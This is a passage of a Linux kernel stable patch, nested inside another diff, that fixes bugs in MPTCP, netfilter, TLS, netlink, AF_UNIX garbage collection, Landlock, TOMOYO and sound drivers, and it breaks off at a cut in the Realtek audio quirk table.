+@@ -966,12 +967,17 @@ int mctp_local_output(struct sock *sk, struct mctp_route *rt,
+ 		rc = mctp_do_fragment_route(rt, skb, mtu, tag);
+ 	}
+ 
++	/* route output functions consume the skb, even on error */
++	skb = NULL;
++
+ out_release:
+ 	if (!ext_rt)
+ 		mctp_route_release(rt);
+ 
+ 	mctp_dev_put(tmp_rt.dev);
+ 
++out_free:
++	kfree_skb(skb);
+ 	return rc;
+ }
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index e57c5f47f0351..7017dd60659dc 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -21,6 +21,9 @@ static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ 	bool slow;
+ 	int err;
+ 
++	if (inet_sk_state_load(sk) == TCP_LISTEN)
++		return 0;
++
+ 	start = nla_nest_start_noflag(skb, INET_ULP_INFO_MPTCP);
+ 	if (!start)
+ 		return -EMSGSIZE;
+@@ -65,7 +68,7 @@ static int subflow_get_info(struct sock *sk, struct sk_buff *skb)
+ 			sf->map_data_len) ||
+ 	    nla_put_u32(skb, MPTCP_SUBFLOW_ATTR_FLAGS, flags) ||
+ 	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_REM, sf->remote_id) ||
+-	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_LOC, sf->local_id)) {
++	    nla_put_u8(skb, MPTCP_SUBFLOW_ATTR_ID_LOC, subflow_get_local_id(sf))) {
+ 		err = -EMSGSIZE;
+ 		goto nla_failure;
+ 	}
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 70a1025f093cf..3328870b0c1f8 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -407,23 +407,12 @@ void mptcp_pm_free_anno_list(struct mptcp_sock *msk)
+ 	}
+ }
+ 
+-static bool lookup_address_in_vec(const struct mptcp_addr_info *addrs, unsigned int nr,
+-				  const struct mptcp_addr_info *addr)
+-{
+-	int i;
+-
+-	for (i = 0; i < nr; i++) {
+-		if (addrs[i].id == addr->id)
+-			return true;
+-	}
+-
+-	return false;
+-}
+-
+ /* Fill all the remote addresses into the array addrs[],
+  * and return the array size.
+  */
+-static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk, bool fullmesh,
++static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk,
++					      struct mptcp_addr_info *local,
++					      bool fullmesh,
+ 					      struct mptcp_addr_info *addrs)
+ {
+ 	bool deny_id0 = READ_ONCE(msk->pm.remote_deny_join_id0);
+@@ -446,15 +435,28 @@ static unsigned int fill_remote_addresses_vec(struct mptcp_sock *msk, bool fullm
+ 		msk->pm.subflows++;
+ 		addrs[i++] = remote;
+ 	} else {
++		DECLARE_BITMAP(unavail_id, MPTCP_PM_MAX_ADDR_ID + 1);
++
++		/* Forbid creation of new subflows matching existing
++		 * ones, possibly already created by incoming ADD_ADDR
++		 */
++		bitmap_zero(unavail_id, MPTCP_PM_MAX_ADDR_ID + 1);
++		mptcp_for_each_subflow(msk, subflow)
++			if (READ_ONCE(subflow->local_id) == local->id)
++				__set_bit(subflow->remote_id, unavail_id);
++
+ 		mptcp_for_each_subflow(msk, subflow) {
+ 			ssk = mptcp_subflow_tcp_sock(subflow);
+ 			remote_address((struct sock_common *)ssk, &addrs[i]);
+-			addrs[i].id = subflow->remote_id;
++			addrs[i].id = READ_ONCE(subflow->remote_id);
+ 			if (deny_id0 && !addrs[i].id)
+ 				continue;
+ 
+-			if (!lookup_address_in_vec(addrs, i, &addrs[i]) &&
+-			    msk->pm.subflows < subflows_max) {
++			if (msk->pm.subflows < subflows_max) {
++				/* forbid creating multiple address towards
++				 * this id
++				 */
++				__set_bit(addrs[i].id, unavail_id);
+ 				msk->pm.subflows++;
+ 				i++;
+ 			}
+@@ -603,7 +605,7 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		fullmesh = !!(local->flags & MPTCP_PM_ADDR_FLAG_FULLMESH);
+ 
+ 		msk->pm.local_addr_used++;
+-		nr = fill_remote_addresses_vec(msk, fullmesh, addrs);
++		nr = fill_remote_addresses_vec(msk, &local->addr, fullmesh, addrs);
+ 		if (nr)
+ 			__clear_bit(local->addr.id, msk->pm.id_avail_bitmap);
+ 		spin_unlock_bh(&msk->pm.lock);
+@@ -798,18 +800,18 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 
+ 		mptcp_for_each_subflow_safe(msk, subflow, tmp) {
+ 			struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
++			u8 remote_id = READ_ONCE(subflow->remote_id);
+ 			int how = RCV_SHUTDOWN | SEND_SHUTDOWN;
+-			u8 id = subflow->local_id;
++			u8 id = subflow_get_local_id(subflow);
+ 
+-			if (rm_type == MPTCP_MIB_RMADDR && subflow->remote_id != rm_id)
++			if (rm_type == MPTCP_MIB_RMADDR && remote_id != rm_id)
+ 				continue;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW && !mptcp_local_id_match(msk, id, rm_id))
+ 				continue;
+ 
+ 			pr_debug(" -> %s rm_list_ids[%d]=%u local_id=%u remote_id=%u mpc_id=%u",
+ 				 rm_type == MPTCP_MIB_RMADDR ? "address" : "subflow",
+-				 i, rm_id, subflow->local_id, subflow->remote_id,
+-				 msk->mpc_endpoint_id);
++				 i, rm_id, id, remote_id, msk->mpc_endpoint_id);
+ 			spin_unlock_bh(&msk->pm.lock);
+ 			mptcp_subflow_shutdown(sk, ssk, how);
+ 
+@@ -2028,7 +2030,7 @@ static int mptcp_event_add_subflow(struct sk_buff *skb, const struct sock *ssk)
+ 	if (WARN_ON_ONCE(!sf))
+ 		return -EINVAL;
+ 
+-	if (nla_put_u8(skb, MPTCP_ATTR_LOC_ID, sf->local_id))
++	if (nla_put_u8(skb, MPTCP_ATTR_LOC_ID, subflow_get_local_id(sf)))
+ 		return -EMSGSIZE;
+ 
+ 	if (nla_put_u8(skb, MPTCP_ATTR_REM_ID, sf->remote_id))
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 631fa104617c3..414ed70e7ba2e 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -233,7 +233,7 @@ static int mptcp_userspace_pm_remove_id_zero_address(struct mptcp_sock *msk,
+ 
+ 	lock_sock(sk);
+ 	mptcp_for_each_subflow(msk, subflow) {
+-		if (subflow->local_id == 0) {
++		if (READ_ONCE(subflow->local_id) == 0) {
+ 			has_id_0 = true;
+ 			break;
+ 		}
+@@ -489,6 +489,16 @@ int mptcp_nl_cmd_sf_destroy(struct sk_buff *skb, struct genl_info *info)
+ 		goto destroy_err;
+ 	}
+ 
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	if (addr_l.family == AF_INET && ipv6_addr_v4mapped(&addr_r.addr6)) {
++		ipv6_addr_set_v4mapped(addr_l.addr.s_addr, &addr_l.addr6);
++		addr_l.family = AF_INET6;
++	}
++	if (addr_r.family == AF_INET && ipv6_addr_v4mapped(&addr_l.addr6)) {
++		ipv6_addr_set_v4mapped(addr_r.addr.s_addr, &addr_r.addr6);
++		addr_r.family = AF_INET6;
++	}
++#endif
+ 	if (addr_l.family != addr_r.family) {
+ 		GENL_SET_ERR_MSG(info, "address families do not match");
+ 		err = -EINVAL;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 859b18cb8e4f6..3bc21581486ae 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -119,7 +119,7 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	subflow->request_mptcp = 1;
+ 
+ 	/* This is the first subflow, always with id 0 */
+-	subflow->local_id_valid = 1;
++	WRITE_ONCE(subflow->local_id, 0);
+ 	mptcp_sock_graft(msk->first, sk->sk_socket);
+ 
+ 	return 0;
+@@ -1319,6 +1319,7 @@ static int mptcp_sendmsg_frag(struct sock *sk, struct sock *ssk,
+ 		mpext = skb_ext_find(skb, SKB_EXT_MPTCP);
+ 		if (!mptcp_skb_can_collapse_to(data_seq, skb, mpext)) {
+ 			TCP_SKB_CB(skb)->eor = 1;
++			tcp_mark_push(tcp_sk(ssk), skb);
+ 			goto alloc_skb;
+ 		}
+ 
+@@ -2440,6 +2441,8 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	need_push = (flags & MPTCP_CF_PUSH) && __mptcp_retransmit_pending_data(sk);
+ 	if (!dispose_it) {
+ 		__mptcp_subflow_disconnect(ssk, subflow, flags);
++		if (msk->subflow && ssk == msk->subflow->sk)
++			msk->subflow->state = SS_UNCONNECTED;
+ 		release_sock(ssk);
+ 
+ 		goto out;
+@@ -3166,8 +3169,50 @@ static struct ipv6_pinfo *mptcp_inet6_sk(const struct sock *sk)
+ 
+ 	return (struct ipv6_pinfo *)(((u8 *)sk) + offset);
+ }
++
++static void mptcp_copy_ip6_options(struct sock *newsk, const struct sock *sk)
++{
++	const struct ipv6_pinfo *np = inet6_sk(sk);
++	struct ipv6_txoptions *opt;
++	struct ipv6_pinfo *newnp;
++
++	newnp = inet6_sk(newsk);
++
++	rcu_read_lock();
++	opt = rcu_dereference(np->opt);
++	if (opt) {
++		opt = ipv6_dup_options(newsk, opt);
++		if (!opt)
++			net_warn_ratelimited("%s: Failed to copy ip6 options\n", __func__);
++	}
++	RCU_INIT_POINTER(newnp->opt, opt);
++	rcu_read_unlock();
++}
+ #endif
+ 
++static void mptcp_copy_ip_options(struct sock *newsk, const struct sock *sk)
++{
++	struct ip_options_rcu *inet_opt, *newopt = NULL;
++	const struct inet_sock *inet = inet_sk(sk);
++	struct inet_sock *newinet;
++
++	newinet = inet_sk(newsk);
++
++	rcu_read_lock();
++	inet_opt = rcu_dereference(inet->inet_opt);
++	if (inet_opt) {
++		newopt = sock_kmalloc(newsk, sizeof(*inet_opt) +
++				      inet_opt->opt.optlen, GFP_ATOMIC);
++		if (newopt)
++			memcpy(newopt, inet_opt, sizeof(*inet_opt) +
++			       inet_opt->opt.optlen);
++		else
++			net_warn_ratelimited("%s: Failed to copy ip options\n", __func__);
++	}
++	RCU_INIT_POINTER(newinet->inet_opt, newopt);
++	rcu_read_unlock();
++}
++
+ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 				 const struct mptcp_options_received *mp_opt,
+ 				 struct sock *ssk,
+@@ -3188,6 +3233,13 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 
+ 	__mptcp_init_sock(nsk);
+ 
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	if (nsk->sk_family == AF_INET6)
++		mptcp_copy_ip6_options(nsk, sk);
++	else
++#endif
++		mptcp_copy_ip_options(nsk, sk);
++
+ 	msk = mptcp_sk(nsk);
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+@@ -3200,7 +3252,7 @@ struct sock *mptcp_sk_clone_init(const struct sock *sk,
+ 	msk->write_seq = subflow_req->idsn + 1;
+ 	msk->snd_nxt = msk->write_seq;
+ 	msk->snd_una = msk->write_seq;
+-	msk->wnd_end = msk->snd_nxt + req->rsk_rcv_wnd;
++	msk->wnd_end = msk->snd_nxt + tcp_sk(ssk)->snd_wnd;
+ 	msk->setsockopt_seq = mptcp_sk(sk)->setsockopt_seq;
+ 
+ 	if (mp_opt->suboptions & OPTIONS_MPTCP_MPC) {
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index b092205213234..2bc37773e7803 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -475,7 +475,6 @@ struct mptcp_subflow_context {
+ 		can_ack : 1,        /* only after processing the remote a key */
+ 		disposable : 1,	    /* ctx can be free at ulp release time */
+ 		stale : 1,	    /* unable to snd/rcv data, do not use for xmit */
+-		local_id_valid : 1, /* local_id is correctly initialized */
+ 		valid_csum_seen : 1;        /* at least one csum validated */
+ 	enum mptcp_data_avail data_avail;
+ 	u32	remote_nonce;
+@@ -483,7 +482,7 @@ struct mptcp_subflow_context {
+ 	u32	local_nonce;
+ 	u32	remote_token;
+ 	u8	hmac[MPTCPOPT_HMAC_LEN];
+-	u8	local_id;
++	s16	local_id;	    /* if negative not initialized yet */
+ 	u8	remote_id;
+ 	u8	reset_seen:1;
+ 	u8	reset_transient:1;
+@@ -529,6 +528,7 @@ mptcp_subflow_ctx_reset(struct mptcp_subflow_context *subflow)
+ {
+ 	memset(&subflow->reset, 0, sizeof(subflow->reset));
+ 	subflow->request_mptcp = 1;
++	WRITE_ONCE(subflow->local_id, -1);
+ }
+ 
+ static inline u64
+@@ -909,6 +909,15 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ 
++static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflow)
++{
++	int local_id = READ_ONCE(subflow->local_id);
++
++	if (local_id < 0)
++		return 0;
++	return local_id;
++}
++
+ void __init mptcp_pm_nl_init(void);
+ void mptcp_pm_nl_work(struct mptcp_sock *msk);
+ void mptcp_pm_nl_rm_subflow_received(struct mptcp_sock *msk,
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 45d20e20cfc00..891c2f4fed080 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -446,7 +446,7 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->backup = mp_opt.backup;
+ 		subflow->thmac = mp_opt.thmac;
+ 		subflow->remote_nonce = mp_opt.nonce;
+-		subflow->remote_id = mp_opt.join_id;
++		WRITE_ONCE(subflow->remote_id, mp_opt.join_id);
+ 		pr_debug("subflow=%p, thmac=%llu, remote_nonce=%u backup=%d",
+ 			 subflow, subflow->thmac, subflow->remote_nonce,
+ 			 subflow->backup);
+@@ -489,8 +489,8 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 
+ static void subflow_set_local_id(struct mptcp_subflow_context *subflow, int local_id)
+ {
+-	subflow->local_id = local_id;
+-	subflow->local_id_valid = 1;
++	WARN_ON_ONCE(local_id < 0 || local_id > 255);
++	WRITE_ONCE(subflow->local_id, local_id);
+ }
+ 
+ static int subflow_chk_local_id(struct sock *sk)
+@@ -499,7 +499,7 @@ static int subflow_chk_local_id(struct sock *sk)
+ 	struct mptcp_sock *msk = mptcp_sk(subflow->conn);
+ 	int err;
+ 
+-	if (likely(subflow->local_id_valid))
++	if (likely(subflow->local_id >= 0))
+ 		return 0;
+ 
+ 	err = mptcp_pm_get_local_id(msk, (struct sock_common *)sk);
+@@ -1477,7 +1477,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	pr_debug("msk=%p remote_token=%u local_id=%d remote_id=%d", msk,
+ 		 remote_token, local_id, remote_id);
+ 	subflow->remote_token = remote_token;
+-	subflow->remote_id = remote_id;
++	WRITE_ONCE(subflow->remote_id, remote_id);
+ 	subflow->request_join = 1;
+ 	subflow->request_bkup = !!(flags & MPTCP_PM_ADDR_FLAG_BACKUP);
+ 	mptcp_info2sockaddr(remote, &addr, ssk->sk_family);
+@@ -1630,6 +1630,7 @@ static struct mptcp_subflow_context *subflow_create_ctx(struct sock *sk,
+ 	pr_debug("subflow=%p", ctx);
+ 
+ 	ctx->tcp_sock = sk;
++	WRITE_ONCE(ctx->local_id, -1);
+ 
+ 	return ctx;
+ }
+@@ -1867,13 +1868,13 @@ static void subflow_ulp_clone(const struct request_sock *req,
+ 		new_ctx->idsn = subflow_req->idsn;
+ 
+ 		/* this is the first subflow, id is always 0 */
+-		new_ctx->local_id_valid = 1;
++		subflow_set_local_id(new_ctx, 0);
+ 	} else if (subflow_req->mp_join) {
+ 		new_ctx->ssn_offset = subflow_req->ssn_offset;
+ 		new_ctx->mp_join = 1;
+ 		new_ctx->fully_established = 1;
+ 		new_ctx->backup = subflow_req->backup;
+-		new_ctx->remote_id = subflow_req->remote_id;
++		WRITE_ONCE(new_ctx->remote_id, subflow_req->remote_id);
+ 		new_ctx->token = subflow_req->token;
+ 		new_ctx->thmac = subflow_req->thmac;
+ 
+diff --git a/net/netfilter/core.c b/net/netfilter/core.c
+index 55a7f72d547cd..edf92074221e2 100644
+--- a/net/netfilter/core.c
++++ b/net/netfilter/core.c
+@@ -707,6 +707,22 @@ void nf_conntrack_destroy(struct nf_conntrack *nfct)
+ }
+ EXPORT_SYMBOL(nf_conntrack_destroy);
+ 
++void nf_ct_set_closing(struct nf_conntrack *nfct)
++{
++	const struct nf_ct_hook *ct_hook;
++
++	if (!nfct)
++		return;
++
++	rcu_read_lock();
++	ct_hook = rcu_dereference(nf_ct_hook);
++	if (ct_hook)
++		ct_hook->set_closing(nfct);
++
++	rcu_read_unlock();
++}
++EXPORT_SYMBOL_GPL(nf_ct_set_closing);
++
+ bool nf_ct_get_tuple_skb(struct nf_conntrack_tuple *dst_tuple,
+ 			 const struct sk_buff *skb)
+ {
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 7960262966094..024f93fc8c0bb 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -2772,11 +2772,24 @@ int nf_conntrack_init_start(void)
+ 	return ret;
+ }
+ 
++static void nf_conntrack_set_closing(struct nf_conntrack *nfct)
++{
++	struct nf_conn *ct = nf_ct_to_nf_conn(nfct);
++
++	switch (nf_ct_protonum(ct)) {
++	case IPPROTO_TCP:
++		nf_conntrack_tcp_set_closing(ct);
++		break;
++	}
++}
++
+ static const struct nf_ct_hook nf_conntrack_hook = {
+ 	.update		= nf_conntrack_update,
+ 	.destroy	= nf_ct_destroy,
+ 	.get_tuple_skb  = nf_conntrack_get_tuple_skb,
+ 	.attach		= nf_conntrack_attach,
++	.set_closing	= nf_conntrack_set_closing,
++	.confirm	= __nf_conntrack_confirm,
+ };
+ 
+ void nf_conntrack_init_end(void)
+diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
+index e0092bf273fd0..9480e638e5d15 100644
+--- a/net/netfilter/nf_conntrack_proto_tcp.c
++++ b/net/netfilter/nf_conntrack_proto_tcp.c
+@@ -913,6 +913,41 @@ static bool tcp_can_early_drop(const struct nf_conn *ct)
+ 	return false;
+ }
+ 
++void nf_conntrack_tcp_set_closing(struct nf_conn *ct)
++{
++	enum tcp_conntrack old_state;
++	const unsigned int *timeouts;
++	u32 timeout;
++
++	if (!nf_ct_is_confirmed(ct))
++		return;
++
++	spin_lock_bh(&ct->lock);
++	old_state = ct->proto.tcp.state;
++	ct->proto.tcp.state = TCP_CONNTRACK_CLOSE;
++
++	if (old_state == TCP_CONNTRACK_CLOSE ||
++	    test_bit(IPS_FIXED_TIMEOUT_BIT, &ct->status)) {
++		spin_unlock_bh(&ct->lock);
++		return;
++	}
++
++	timeouts = nf_ct_timeout_lookup(ct);
++	if (!timeouts) {
++		const struct nf_tcp_net *tn;
++
++		tn = nf_tcp_pernet(nf_ct_net(ct));
++		timeouts = tn->timeouts;
++	}
++
++	timeout = timeouts[TCP_CONNTRACK_CLOSE];
++	WRITE_ONCE(ct->timeout, timeout + nfct_time_stamp);
++
++	spin_unlock_bh(&ct->lock);
++
++	nf_conntrack_event_cache(IPCT_PROTOINFO, ct);
++}
++
+ static void nf_ct_tcp_state_reset(struct ip_ct_tcp_state *state)
+ {
+ 	state->td_end		= 0;
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index e21ec3ad80939..d3ba947f43761 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -4752,6 +4752,9 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
+ 
++		if (flags & NFT_SET_ANONYMOUS)
++			return -EOPNOTSUPP;
++
+ 		err = nf_msecs_to_jiffies64(nla[NFTA_SET_TIMEOUT], &desc.timeout);
+ 		if (err)
+ 			return err;
+@@ -4760,6 +4763,10 @@ static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
+ 	if (nla[NFTA_SET_GC_INTERVAL] != NULL) {
+ 		if (!(flags & NFT_SET_TIMEOUT))
+ 			return -EINVAL;
++
++		if (flags & NFT_SET_ANONYMOUS)
++			return -EOPNOTSUPP;
++
+ 		desc.gc_int = ntohl(nla_get_be32(nla[NFTA_SET_GC_INTERVAL]));
+ 	}
+ 
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index e1623fbf36548..e4b8c02c5e6ae 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -358,10 +358,20 @@ static int nft_target_validate(const struct nft_ctx *ctx,
+ 
+ 	if (ctx->family != NFPROTO_IPV4 &&
+ 	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET &&
+ 	    ctx->family != NFPROTO_BRIDGE &&
+ 	    ctx->family != NFPROTO_ARP)
+ 		return -EOPNOTSUPP;
+ 
++	ret = nft_chain_validate_hooks(ctx->chain,
++				       (1 << NF_INET_PRE_ROUTING) |
++				       (1 << NF_INET_LOCAL_IN) |
++				       (1 << NF_INET_FORWARD) |
++				       (1 << NF_INET_LOCAL_OUT) |
++				       (1 << NF_INET_POST_ROUTING));
++	if (ret)
++		return ret;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+@@ -607,10 +617,20 @@ static int nft_match_validate(const struct nft_ctx *ctx,
+ 
+ 	if (ctx->family != NFPROTO_IPV4 &&
+ 	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET &&
+ 	    ctx->family != NFPROTO_BRIDGE &&
+ 	    ctx->family != NFPROTO_ARP)
+ 		return -EOPNOTSUPP;
+ 
++	ret = nft_chain_validate_hooks(ctx->chain,
++				       (1 << NF_INET_PRE_ROUTING) |
++				       (1 << NF_INET_LOCAL_IN) |
++				       (1 << NF_INET_FORWARD) |
++				       (1 << NF_INET_LOCAL_OUT) |
++				       (1 << NF_INET_POST_ROUTING));
++	if (ret)
++		return ret;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index 6857a4965fe87..e9b81cba1e2b4 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -167,7 +167,7 @@ static inline u32 netlink_group_mask(u32 group)
+ static struct sk_buff *netlink_to_full_skb(const struct sk_buff *skb,
+ 					   gfp_t gfp_mask)
+ {
+-	unsigned int len = skb_end_offset(skb);
++	unsigned int len = skb->len;
+ 	struct sk_buff *new;
+ 
+ 	new = alloc_skb(len, gfp_mask);
+diff --git a/net/tls/tls_sw.c b/net/tls/tls_sw.c
+index 93e1bfa72d791..2bd27b77769cb 100644
+--- a/net/tls/tls_sw.c
++++ b/net/tls/tls_sw.c
+@@ -273,6 +273,8 @@ static int tls_do_decryption(struct sock *sk,
+ 			return 0;
+ 
+ 		ret = crypto_wait_req(ret, &ctx->async_wait);
++	} else if (darg->async) {
++		atomic_dec(&ctx->decrypt_pending);
+ 	}
+ 	darg->async = false;
+ 
+@@ -2021,6 +2023,7 @@ int tls_sw_recvmsg(struct sock *sk,
+ 	struct strp_msg *rxm;
+ 	struct tls_msg *tlm;
+ 	ssize_t copied = 0;
++	ssize_t peeked = 0;
+ 	bool async = false;
+ 	int target, err;
+ 	bool is_kvec = iov_iter_is_kvec(&msg->msg_iter);
+@@ -2168,8 +2171,10 @@ int tls_sw_recvmsg(struct sock *sk,
+ 			if (err < 0)
+ 				goto put_on_rx_list_err;
+ 
+-			if (is_peek)
++			if (is_peek) {
++				peeked += chunk;
+ 				goto put_on_rx_list;
++			}
+ 
+ 			if (partially_consumed) {
+ 				rxm->offset += chunk;
+@@ -2208,8 +2213,8 @@ int tls_sw_recvmsg(struct sock *sk,
+ 
+ 		/* Drain records from the rx_list & copy if required */
+ 		if (is_peek || is_kvec)
+-			err = process_rx_list(ctx, msg, &control, copied,
+-					      decrypted, is_peek, NULL);
++			err = process_rx_list(ctx, msg, &control, copied + peeked,
++					      decrypted - peeked, is_peek, NULL);
+ 		else
+ 			err = process_rx_list(ctx, msg, &control, 0,
+ 					      async_copy_bytes, is_peek, NULL);
+diff --git a/net/unix/garbage.c b/net/unix/garbage.c
+index 767b338a7a2d4..ab2c83d58b62a 100644
+--- a/net/unix/garbage.c
++++ b/net/unix/garbage.c
+@@ -284,9 +284,17 @@ void unix_gc(void)
+ 	 * which are creating the cycle(s).
+ 	 */
+ 	skb_queue_head_init(&hitlist);
+-	list_for_each_entry(u, &gc_candidates, link)
++	list_for_each_entry(u, &gc_candidates, link) {
+ 		scan_children(&u->sk, inc_inflight, &hitlist);
+ 
++#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
++		if (u->oob_skb) {
++			kfree_skb(u->oob_skb);
++			u->oob_skb = NULL;
++		}
++#endif
++	}
++
+ 	/* not_cycle_list contains those sockets which do not make up a
+ 	 * cycle.  Restore these to the inflight list.
+ 	 */
+@@ -314,17 +322,6 @@ void unix_gc(void)
+ 	/* Here we are. Hitlist is filled. Die. */
+ 	__skb_queue_purge(&hitlist);
+ 
+-#if IS_ENABLED(CONFIG_AF_UNIX_OOB)
+-	list_for_each_entry_safe(u, next, &gc_candidates, link) {
+-		struct sk_buff *skb = u->oob_skb;
+-
+-		if (skb) {
+-			u->oob_skb = NULL;
+-			kfree_skb(skb);
+-		}
+-	}
+-#endif
+-
+ 	spin_lock(&unix_gc_lock);
+ 
+ 	/* There could be io_uring registered files, just push them back to
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index c259d3227a9e2..1a3bd554e2586 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -4137,6 +4137,8 @@ static int nl80211_set_interface(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		if (ntype != NL80211_IFTYPE_MESH_POINT)
+ 			return -EINVAL;
++		if (otype != NL80211_IFTYPE_MESH_POINT)
++			return -EINVAL;
+ 		if (netif_running(dev))
+ 			return -EBUSY;
+ 
+diff --git a/security/landlock/fs.c b/security/landlock/fs.c
+index 64ed7665455fe..d328965f32f7f 100644
+--- a/security/landlock/fs.c
++++ b/security/landlock/fs.c
+@@ -824,8 +824,8 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	bool allow_parent1, allow_parent2;
+ 	access_mask_t access_request_parent1, access_request_parent2;
+ 	struct path mnt_dir;
+-	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS],
+-		layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS];
++	layer_mask_t layer_masks_parent1[LANDLOCK_NUM_ACCESS_FS] = {},
++		     layer_masks_parent2[LANDLOCK_NUM_ACCESS_FS] = {};
+ 
+ 	if (!dom)
+ 		return 0;
+diff --git a/security/tomoyo/common.c b/security/tomoyo/common.c
+index f4cd9b58b2054..a7af085550b2d 100644
+--- a/security/tomoyo/common.c
++++ b/security/tomoyo/common.c
+@@ -2648,13 +2648,14 @@ ssize_t tomoyo_write_control(struct tomoyo_io_buffer *head,
+ {
+ 	int error = buffer_len;
+ 	size_t avail_len = buffer_len;
+-	char *cp0 = head->write_buf;
++	char *cp0;
+ 	int idx;
+ 
+ 	if (!head->write)
+ 		return -EINVAL;
+ 	if (mutex_lock_interruptible(&head->io_sem))
+ 		return -EINTR;
++	cp0 = head->write_buf;
+ 	head->read_user_buf_avail = 0;
+ 	idx = tomoyo_read_lock();
+ 	/* Read a line and dispatch it to the policy handler. */
+diff --git a/sound/core/Makefile b/sound/core/Makefile
+index 2762f03d9b7bc..a7a1590b29526 100644
+--- a/sound/core/Makefile
++++ b/sound/core/Makefile
+@@ -30,7 +30,6 @@ snd-ctl-led-objs  := control_led.o
+ snd-rawmidi-objs  := rawmidi.o
+ snd-timer-objs    := timer.o
+ snd-hrtimer-objs  := hrtimer.o
+-snd-rtctimer-objs := rtctimer.o
+ snd-hwdep-objs    := hwdep.o
+ snd-seq-device-objs := seq_device.o
+ 
+diff --git a/sound/firewire/amdtp-stream.c b/sound/firewire/amdtp-stream.c
+index 9be2260e4ca2d..f8b644cb9157a 100644
+--- a/sound/firewire/amdtp-stream.c
++++ b/sound/firewire/amdtp-stream.c
+@@ -934,7 +934,7 @@ static int generate_device_pkt_descs(struct amdtp_stream *s,
+ 				// to the reason.
+ 				unsigned int safe_cycle = increment_ohci_cycle_count(next_cycle,
+ 								IR_JUMBO_PAYLOAD_MAX_SKIP_CYCLES);
+-				lost = (compare_ohci_cycle_count(safe_cycle, cycle) > 0);
++				lost = (compare_ohci_cycle_count(safe_cycle, cycle) < 0);
+ 			}
+ 			if (lost) {
+ 				dev_err(&s->unit->device, "Detect discontinuity of cycle: %d %d\n",
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 92a656fb53212..75bd7b2fa4ee6 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9662,6 +9662,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
